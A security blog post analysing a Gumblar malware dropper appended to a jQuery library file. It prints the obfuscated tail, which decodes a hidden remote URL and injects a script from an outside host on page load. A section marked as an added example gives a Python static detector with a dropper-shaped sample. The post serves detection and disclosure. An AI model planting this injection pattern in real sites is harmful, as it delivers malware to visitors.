• When Benign scripts attack – V

    This post continues our series capturing how hackers inject malware into benign scripts in the hope of hiding their malicious content among good code. The malicious code shown this time leads to the well-known “Gumblar” infection strain and can cause a lot of headaches. This particular strain is not new, but it has been resurfacing in the last few weeks, hence the focus on this specific piece.

    This example shows how a hacker used a jQuery script to spread malicious code. The example is lightly obfuscated. The code was mined from www.i-movix.com/en/distributors/.

    On line 15 you can find:

    <scri pt type="text/javas cript" src="/plugins/system/ jceutilities/js/jqu ery-126.js">
    

    This tag loads the file shown below:

    /*
    * jQuery 1.2.6 - New Wave Javascript
    *
    * Copyright (c) 2008 John Resig (jquery.com)
    * Dual licensed under the MIT (MIT-LICENSE.txt)
    * and GPL (GPL-LICENSE.txt) licenses.
    *
    * $Date: 2008-05-24 14:22:17 -0400 (Sat, 24 May 2008) $
    * $Rev: 5685 $
    */
    eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)
    >35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while
    (c--)r[e(c)]=k||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1}
    
    **code removed for brevity**
    
    while(c--)if(k)p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k);return p}('(H
    (){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s
    )+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b){d=d||S;G(d.16){
    
    **malicious code**
    
    /*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement
    ('scri pt');H3qqe 3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute
    ('id', 'myscript1');H3qqea3ur6p.setAttribute('src',  'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v(
    )@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$
    )n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@
    0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(
    m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##
    )!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a
    &!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|
    \$/ig, ''));H3 qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea
    3ur6p);}} cat h(e) {}
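    The tail appended to the library above hides its download URL by padding it with filler characters (^ & @ ) ( # ! $) and stripping them at runtime with a .replace() call, then injecting a deferred script element once the page has loaded. The following Python scanner is an added example, not code from this post or from jQuery: it statically decodes that filler trick without executing any JavaScript and reports the behavioural indicators of the dropper. The sample file, the variable names and the placeholder host example.invalid are constructed for the example; it assumes the filler regex is a plain alternation of escaped single characters, which is the only form it needs to translate from JavaScript to Python.

```python
"""Static detector for the 'benign library + appended dropper' pattern.

Added example, not code from the StopTheHacker post or from jQuery. It decodes
the filler-character string trick ('h#!t&...'.replace(/\^|&|.../ig, '')) by
applying the same regex statically, and lists the dropper's indicators.
All input below is constructed; the URL decodes to a placeholder host.
"""
import re
from urllib.parse import urlsplit

# Constructed sample in the shape the post shows: a packed jQuery header
# followed by an appended try{window.onload = ...}catch(e){} dropper.
SAMPLE_JS = r"""/*
* jQuery 1.2.6 - New Wave Javascript
*/
eval(function(p,a,c,k,e,r){return p}('(function(){})'))
/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!t&##(t&()p$$:!#@/!(/$#e!)x!&a(m^p#l@e.$i!n&v$a#l(i)d:)8(0$)@$8^#^@0/d#r@o$p.j^s'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}
"""

# 'literal'.replace(/regex/flags, '')  ->  groups: literal, regex body, flags
STRIP_CALL = re.compile(
    r"'((?:[^'\\\n]|\\.)*)'"                   # single-quoted JS string literal
    r"\.replace\(/((?:[^/\\]|\\.)+)/([a-z]*)"  # regex body and its flags
    r"\s*,\s*(?:''|\"\")\s*\)"                 # replacement is the empty string
)

# Behavioural indicators of the dropper tail (hypothetical names chosen here).
INDICATORS = {
    "dynamic_script_element": re.compile(r"createElement\(\s*['\"]script['\"]\s*\)"),
    "onload_hook": re.compile(r"window\.onload\s*="),
    "deferred_load": re.compile(r"setAttribute\(\s*['\"]defer['\"]"),
    "appended_to_body": re.compile(r"document\.body\.appendChild"),
    "errors_swallowed": re.compile(r"catch\s*\(\s*\w+\s*\)\s*\{\s*\}"),
}


def decode_filler_strings(js):
    """Find every 'literal'.replace(/filler/, '') call and decode it statically.

    The JS regex is reused as a Python regex; this is only safe for the simple
    alternation-of-escaped-characters form the dropper uses (an assumption).
    """
    results = []
    for m in STRIP_CALL.finditer(js):
        literal, js_regex, js_flags = m.group(1), m.group(2), m.group(3)
        # minimal unescaping of the JS string literal
        literal = literal.replace("\\'", "'").replace("\\\\", "\\")
        flags = re.IGNORECASE if "i" in js_flags else 0
        decoded = re.sub(js_regex, "", literal, flags=flags)
        results.append({"obfuscated": literal, "filler_regex": js_regex,
                        "decoded": decoded})
    return results


def scan_script(js):
    """Return the indicators found, the decoded strings and the hosts they name."""
    found = [name for name, rx in INDICATORS.items() if rx.search(js)]
    decoded = decode_filler_strings(js)
    hosts = [h for h in (urlsplit(d["decoded"]).hostname for d in decoded) if h]
    return {
        "indicators": found,
        "decoded": decoded,
        "hosts": hosts,
        # verdict: a hidden URL feeding a dynamically created script element
        "dropper": bool(hosts) and "dynamic_script_element" in found,
    }


if __name__ == "__main__":
    report = scan_script(SAMPLE_JS)
    print("indicators:", ", ".join(report["indicators"]))
    for d in report["decoded"]:
        print("decoded:", d["decoded"])
    print("hosts:", report["hosts"], "dropper:", report["dropper"])
```

Run against a copy of a site's jquery-*.js; a legitimate build of the library yields no decoded strings and none of the indicators, so any host that comes out is worth checking against the site's own domains before the file is restored from a clean copy.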
    

    Till next time…

    • Please check my article for fixing this:

      http://ju stcod ed.c om/article/gu mblar-family-virus-removal-tool/

      Posted by Konstantin Boyko on December 24th

    • […] it seems that most of the forums which were hacked are using jQuery. This ties in well with our observations regarding jQuery scripts being used to push malware towards unsuspecting […]

      Posted by “Online Pharmacy” Spam stalks Internet Forums/Discussion Boards – StopTheHacker.com – Jaal, LLC. on January 26th

    • […] Only 0.63% of Joomla sites use jQuery. Note: JQuery has been known to be targeted by malicious hackers as a code-injection delivery mechanism. […]

      Posted by Analyzing Popular CMSs: Are Joomla Users at Risk? – StopTheHacker.com – Jaal, LLC. on February 1st

    • […] 44.4% of WordPress sites which had Iframes were using JQuery. Note: JQuery has been known to be targeted by malicious hackers as a code-injection delivery mechanism. […]

      Posted by Analyzing Popular CMSs: Are WordPress Users at Risk? – StopTheHacker.com – Jaal, LLC. on February 2nd

    • […] post is going to show an example of a trend about which we blogged a few months ago. We are going to concentrate on the way hackers use “backup-sources” […]

      Posted by Hackers understand the value of backups! – stopthehacker.com – Jaal, LLC on May 4th

    • […] of a well known javascript framework used widely by developers: JQuery. In the past we have seen hackers targeting JQuery, but in a slightly different […]

      Posted by Malware posing as Jquery – stopthehacker.com – Jaal, LLC on January 13th